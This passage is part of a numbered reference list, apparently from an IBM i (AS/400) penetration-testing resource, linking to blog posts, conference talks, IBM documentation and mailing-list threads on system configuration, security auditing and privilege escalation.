AS/400 - Configuration TCP/IP - Podalirius - August 5, 2021](https://podalirius.net/en/mainframe/ibm-as-400-tcp-ip-configuration/) 650 * [IBM I FOR WINTEL HACKERS - TROOPERS 2024 - ZOLTÁN PÁNCZÉL, BÁLINT VARGA-PERKE - June 26th, 2024](https://silentsignal.hu/docs/S2-TROOPERS24-IBM_i_for_Wintel_Hackers.pdf) 651 * [IBM i Privileged Users – A Unique Security Challenge - Patrick Townsend - June 27, 2017](https://info.townsendsecurity.com/ibm-i-privileged-users-a-unique-security-challenge) 652 * [IBM i Security Demystified Blog, Episode 1 - Matthew Carpenter - June 23, 2020](https://web.archive.org/web/20200704060220/https://blog.grimm-co.com/2020/06/ibm-i-security-demystified-blog-episode.html) 653 * [IPL types and modes for IBM AS/400 - Podalirius - June 16, 2021](https://podalirius.net/en/mainframe/ipl-modes-for-ibm-as400/) 654 * [Is Your IBM i (iSeries/AS400) Security Vulnerable To Privilege Escalation And Lack Of Proper Access Controls? - Bob Losey - June 6, 2022](https://www.linkedin.com/pulse/your-ibm-i-iseriesas400-security-vulnerable-privilege-bob-losey/) 655 * [Pentest AS/400 - COGICEO](https://www.ossir.org/jssi/jssi2016/Pentest_AS400_COGICEO.pdf) 656 * [Re: [PEN-TEST] Pen-Testing AS/400 - Al Sparks - December 12, 2000](https://seclists.org/pen-test/2000/Dec/205) 657 * [Restoring an IBM AS/400 (9401-150) - Podalirius - June 10, 2021](https://podalirius.net/en/mainframe/restoring-an-ibm-as400-9401-150/) 658 * [Security Assessment of the IBM i (AS 400) System – Part 1 - Shashank Gosavi - August 14, 2020](https://web.archive.org/web/20200921183809/https://iisecurity.in/blog/security-assessment-ibm-400-system-part-1/) 659 * [Security Audit of IBM AS/400 and System i : Part 1 - Yogesh Prasad - August 21, 2018](https://web.archive.org/web/20200927010533/https://blog.securitybrigade.com/security-audit-of-ibm-as-400-system-i-part-1/) 660 * [Security Audit of IBM AS/400 and System i : Part 2 - Yogesh Prasad - August 22, 2018](https://web.archive.org/web/20200927002911/https://blog.securitybrigade.com/security-audit-ibm-as-400-system-i-2/) 661 * [Simple IBM i (AS/400) hacking - Zoltán Pánczél - September 5, 2022](https://blog.silentsignal.eu/2022/09/05/simple-ibm-i-as-400-hacking/) 662 * [Special authority - IBM - April 11, 2023](https://www.ibm.com/docs/en/i/7.4?topic=fields-special-authority) 663 * [Stealing User Profiles! Exploiting Unsecured User Profiles on IBM i. - Dan Riehl - December 28, 2017](https://www.securemyi.com/nl/articles/hijack.html) 664 * [TCP/IP Ports Required for IBM i Access and Related Functions - IBM - December 4, 2023](https://www.ibm.com/support/pages/tcpip-ports-required-ibm-i-access-and-related-functions) 665 * [TROOPERS24: IBM i for Wintel Hackers - Bálint Varga-Perke, Zoltán Pánczél - Septemeber 2, 2024](https://www.youtube.com/watch?v=t4fUvfzgUbY) 666 * [Vulnerability Archeology: Stealing Passwords with IBM i Access Client Solutions - Silent Signal - January 21, 2025](https://blog.silentsignal.eu/2025/01/21/ibm-acs-password-dump/) 667 * [Why Building an OS/400 Lab at Home Was Harder Than I Expected - Podalirius - January 24, 2020](https://podalirius.net/en/mainframe/why-building-an-os-400-lab-at-home-was-harder-than-i-expected/)